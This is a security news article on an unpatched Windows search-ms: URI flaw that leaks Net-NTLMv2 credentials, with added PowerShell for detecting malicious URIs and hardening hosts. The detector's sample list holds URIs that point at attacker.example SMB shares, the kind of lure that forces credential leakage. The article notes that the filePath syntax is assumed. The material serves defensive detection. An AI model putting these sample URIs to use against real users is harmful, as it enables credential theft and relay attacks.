Unpatched Windows Search URI Vulnerability Exposes User Credentials to Attackers
An unpatched vulnerability in the Windows Search (search-ms:) URI handler has been disclosed, potentially exposing user credentials to attackers. The issue, similar to CVE-2026-33829, lets an attacker capture a victim's Net-NTLMv2 response (commonly called an "NTLMv2 hash"), which can be cracked offline or relayed to gain unauthorized access. The flaw resides in the search URI handler, as highlighted by Huntress.
The issue stems from the handler accepting a 'filePath' parameter without validating it. If the parameter is pointed at an attacker-controlled UNC path, opening the URI makes Windows connect to that share and authenticate, exposing the victim's Net-NTLMv2 response. Varonis demonstrated the same outcome in February 2024 by abusing the 'crumb' parameter instead, and Varonis also documented the related CVE-2023-35636.
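The following PowerShell is an added example, not code from Huntress, Varonis or the article, that shows what a defender would look for in a suspicious search-ms: URI: a 'crumb' or 'filePath' value that resolves to a remote UNC or file:// location, which is what forces the outbound authentication. The sample URIs are constructed for illustration, and the exact parameter syntax the handler accepts (in particular the 'filePath' form) is an assumption.

```powershell
# Added example: flag search-ms: URIs whose 'crumb' or 'filePath' parameter points
# off-host. Parameter syntax (especially filePath) is assumed, not taken from the advisory.
function Test-SearchMsUri {
    param([Parameter(Mandatory)][string]$Uri)

    if ($Uri -notmatch '^search-ms:') { return $null }

    # Everything after the scheme is a &-separated key=value list.
    $query  = $Uri -replace '^search-ms:', ''
    $params = @{}
    foreach ($pair in $query -split '&') {
        $kv = $pair -split '=', 2
        if ($kv.Count -eq 2) {
            # Percent-decode so %5C%5C is seen as \\.
            $params[$kv[0].ToLower()] = [uri]::UnescapeDataString($kv[1])
        }
    }

    $remote = @()
    foreach ($key in 'crumb', 'filepath') {
        if (-not $params.ContainsKey($key)) { continue }
        $value = $params[$key] -replace '^location:', ''
        # A UNC path (\\host\share) or a file://host/share URI both trigger an
        # SMB (or WebDAV fallback) connection and therefore NTLM authentication.
        if ($value -match '^\\\\[^\\]+' -or $value -match '^file://') {
            $remote += "$key=$value"
        }
    }

    [pscustomobject]@{
        Uri           = $Uri
        RemoteTargets = $remote
        Suspicious    = ($remote.Count -gt 0)
    }
}

# Constructed sample URIs (not real captures).
$samples = @(
    'search-ms:query=report&crumb=location:\\10.0.0.5\share&displayname=Documents',
    'search-ms:displayname=Downloads&crumb=location:%5C%5Cattacker.example%5Cshare',
    'search-ms:query=*&filePath=\\attacker.example\share\doc.txt',   # filePath form assumed
    'search-ms:query=invoice&crumb=location:C:\Users\Public'          # local path, benign
)
$samples | ForEach-Object { Test-SearchMsUri $_ } |
    Format-Table Suspicious, RemoteTargets, Uri -AutoSize
```

The first three samples are reported as suspicious and the local-path one is not. The same check can be run over proxy logs, e-mail bodies or HTML extracted from a phishing kit, wherever a search-ms: link might be delivered.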
The consequences are severe. A captured Net-NTLMv2 response can be cracked offline to recover the user's password, and if the attacker proxies the authentication live rather than recording it, it can be relayed to internal services that do not enforce signing, giving deeper access into the network. Despite responsible disclosure, Microsoft declined to address the issue, citing its severity criteria. Organizations are therefore advised to apply compensating controls to mitigate the risk.
To protect against this vulnerability, organizations should consider the following:
- Block outbound SMB (TCP/445 and TCP/139) on hosts that don't require it. Note that Windows falls back to WebDAV (TCP/80 and TCP/443) when SMB is unreachable, so the WebClient service should be disabled or its traffic blocked as well.
- Enforce SMB signing (and LDAP signing and channel binding) so that a relayed NTLM session is rejected by internal services. Signing does not prevent offline cracking of a captured response.
- Restrict or disable outbound NTLM where applications tolerate it, starting in audit mode to find what still depends on it.
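The script below is an added example, not part of the original article, that applies the three mitigations on a single Windows host. It assumes it is run as Administrator, that the registry values follow the documented semantics of the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy (1 = audit, 2 = deny), and that audit mode is wanted unless -Enforce is passed.

```powershell
# Added example: per-host hardening for the search-ms: NTLM leak. Run elevated.
# Without -Enforce, outbound NTLM is audited rather than blocked.
param([switch]$Enforce)

# 1. Block outbound SMB (TCP/445, TCP/139) on every profile. Windows falls back
#    to WebDAV when SMB is blocked, so the WebClient service is stopped too.
foreach ($port in 445, 139) {
    $name = "Block outbound SMB TCP/$port"
    if (-not (Get-NetFirewallRule -DisplayName $name -ErrorAction SilentlyContinue)) {
        New-NetFirewallRule -DisplayName $name -Direction Outbound -Protocol TCP `
            -RemotePort $port -Action Block -Profile Any | Out-Null
    }
}
Stop-Service -Name WebClient -ErrorAction SilentlyContinue
Set-Service  -Name WebClient -StartupType Disabled -ErrorAction SilentlyContinue

# 2. Require SMB signing on both the client and server side so a relayed
#    session without a valid session key is rejected.
Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force

# 3. Restrict outgoing NTLM. RestrictSendingNTLMTraffic: 1 = audit all, 2 = deny all.
#    LmCompatibilityLevel 5 refuses LM and NTLMv1 so only Net-NTLMv2 is ever sent.
$lsa      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$ntlmMode = if ($Enforce) { 2 } else { 1 }
New-ItemProperty -Path "$lsa\MSV1_0" -Name RestrictSendingNTLMTraffic `
    -PropertyType DWord -Value $ntlmMode -Force | Out-Null
New-ItemProperty -Path $lsa -Name LmCompatibilityLevel `
    -PropertyType DWord -Value 5 -Force | Out-Null

# Verification: show the resulting state so the run can be checked in one glance.
Get-NetFirewallRule -DisplayName 'Block outbound SMB*' |
    Select-Object DisplayName, Enabled, Direction, Action
Get-SmbClientConfiguration | Select-Object RequireSecuritySignature
Get-SmbServerConfiguration | Select-Object RequireSecuritySignature
Get-ItemProperty -Path "$lsa\MSV1_0" -Name RestrictSendingNTLMTraffic |
    Select-Object RestrictSendingNTLMTraffic
```

In audit mode, outbound NTLM that would have been blocked is logged to the Microsoft-Windows-NTLM/Operational channel (Event ID 8001); review those events for legitimate dependencies and add them to the ClientAllowedNTLMServers exception list before switching to -Enforce. Deploying the same settings by Group Policy is preferable to per-host scripts in a domain.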
This unpatched vulnerability highlights the ongoing challenge of securing Windows systems when a vendor declines to ship a fix. With no patch to apply, organizations are left relying on compensating controls and on vigilance against emerging threats.